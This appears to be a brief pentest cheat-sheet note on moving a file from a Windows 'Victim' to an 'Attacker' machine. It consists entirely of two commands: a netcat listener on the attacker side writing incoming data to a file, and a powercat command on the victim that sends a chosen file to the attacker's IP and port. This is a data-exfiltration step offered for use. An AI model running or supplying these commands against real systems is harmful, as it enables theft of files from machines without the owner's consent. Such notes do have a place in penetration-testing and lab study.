Attacker :-

sudo nc -nvlp <port> > <file-to-receive>

Victim (window)

powercat -c <ip> -p <port> -i <file-to-transfer>